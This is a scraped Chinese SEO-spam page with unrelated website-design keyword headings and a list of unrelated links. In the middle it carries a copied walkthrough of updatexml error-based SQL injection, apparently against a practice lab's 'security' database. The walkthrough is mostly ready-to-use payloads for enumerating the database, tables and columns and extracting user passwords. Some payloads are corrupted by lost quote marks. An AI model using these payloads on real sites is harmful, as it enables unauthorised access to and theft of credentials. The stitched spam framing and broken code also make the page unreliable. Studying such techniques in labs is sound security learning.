当前位置: 首页 > news >正文

网站开发学习流程图企业网页设计尺寸

网站开发学习流程图,企业网页设计尺寸,上饶网站网站建设,做推广用那个网站吗目录 1.updatexml报错原理 2.判断是否有注入点 我们在地址栏中输入?id1 我们在地址栏中输入?id1-- 3.updatexml报错注入 3.1爆库名 3.2爆表名 3.3爆字段名 3.4爆数据 1.updatexml报错原理 updatexml(xml_doument,XPath_string,new_value) 第一个参数#xff1a;XML…目录 1.updatexml报错原理 2.判断是否有注入点 我们在地址栏中输入?id1 我们在地址栏中输入?id1-- 3.updatexml报错注入 3.1爆库名 3.2爆表名 3.3爆字段名 3.4爆数据 1.updatexml报错原理 updatexml(xml_doument,XPath_string,new_value) 第一个参数XML的内容 第二个参数是需要update的位置XPATH路径 第三个参数是更新后的内容 所以第一和第三个参数可以随便写只需要利用第二个参数他会校验你输入的内容是否符合XPATH格式当我们输入一个不符合xpath语法的语句就报错了我们注入利用的就是这一点。 2.判断是否有注入点 我们在地址栏中输入?id1 我们在地址栏中输入?id1-- 根据结果可以判断出存在数字型注入并且页面会打印出报错信息所以我们可以利用报错注入来解决 3.updatexml报错注入 3.1爆库名 ?id1 and updatexml(1,concat(0x7e,database(),0x7e),0) 0x7e表示~符号所以数据库名为security 3.2爆表名 mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库他保存着mysql 服务器所维护的所有其他的数据库信息 包括了 库名表名列名。 在注入时information_schema库的作用就是获取 table_schema table_name, column_name . 这些数据库内的信息。如果information_schema库被过滤掉还可以尝试使用下述库来代替 sys.schema_auto_increment_columns  sys.schema_table_statistics_with_buffer mysql.innodb_table_stats mysql.innodb_table_index  ?id1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemasecurity),0x7e),1)根据结果可知当前security库下有四张表并且users表最有可能存放用户信息 3.3爆字段名 我们通过sql语句查询知道当前数据库有四个表根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。 ?id1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_nameusers),0x7e),1)根据结果可以判断出字段名不全这是因为updataxml函数只显示32位所以我们可以用substr函数来慢慢截取来获得所有的字段名  ?id1 and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,32) frominformation_schema.columns where table_nameusers),0x7e),1) 这样我们最终会得到所有的字段名 如果我们给select语句多加一个where条件会变成什么样呢 ?id1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers),0x7e),1) 此次查询直接就爆出users表的列名可以得到两个敏感字段就是username和password最有可能存放用户的账号密码 3.4爆数据 ?id1 and updatexml(1,concat(0x7e,(select password from users limit1,1),0x7e),1) 通过limit函数可以爆出各个用户的密码 当然也可以通过刚刚所述的substr函数来截取密码 ?id1 and updatexml(1,concat(0x7e,(select substr(group_concat(username,id,password),1,20) from users),0x7e),1) 此次updatexml报错注入就结束啦
http://www.hkea.cn/news/14556798/

相关文章:

  • 模板网站怎么做才美观网站备案核验单
  • 做网站犯法了 程序员有责任吗齐装网
  • html5网站开发实例教程火车wordpress
  • 镜美硅藻泥网站是那家公司做的怎麽用dw做网站轮播海报
  • 花垣县建设局网站html5单页网站
  • 网站公告栏代码山西建立网站营销策划
  • 成都什么是网站建设天津网站建设 熊掌号
  • 做网站体会心得网站怎么不要钱自己做
  • 青岛市城市建设局网站静态网站模板下载
  • 织梦网站被黑做网站要多长时间
  • 松江网站建设推广wordpress 相册形式
  • 网站会员方案怎么找需要推广的商家
  • 钢铁网站模板电子信息工程能进国家电网吗
  • 做屏保那个网站下载图好公司企业宣传片制作公司
  • 佛山做网站优化做网站做哪个好
  • 可以做用户旅程图的网站企业型网站建设咨询电话
  • 网站建设sql语句留言板木疙瘩h5制作
  • 网站公司怎么做的wordpress 几百万数据
  • 成都平台网站建设公司网站开发详细介绍
  • 校园网站建设目标直播秀场网站开发
  • 巴彦淖尔 网站建设珠宝类网站建设
  • 公司网站建设网络推广wordpress 嵌入python
  • 直播网站的建设龙岗网络推广方式
  • 网站开发前端招聘网站开发仿站
  • 济南软件开发培训机构seo优化教程
  • html5网站用什么软件dw超链接自己做的网站
  • 扬州网站建设 天维2021年热门关键词
  • vs怎么添加做网站天宁区建设局网站
  • 昆明seo网站wordpress模版建站
  • 建设自己的网站需要哪些步骤制作网页时科学规划网页的做法是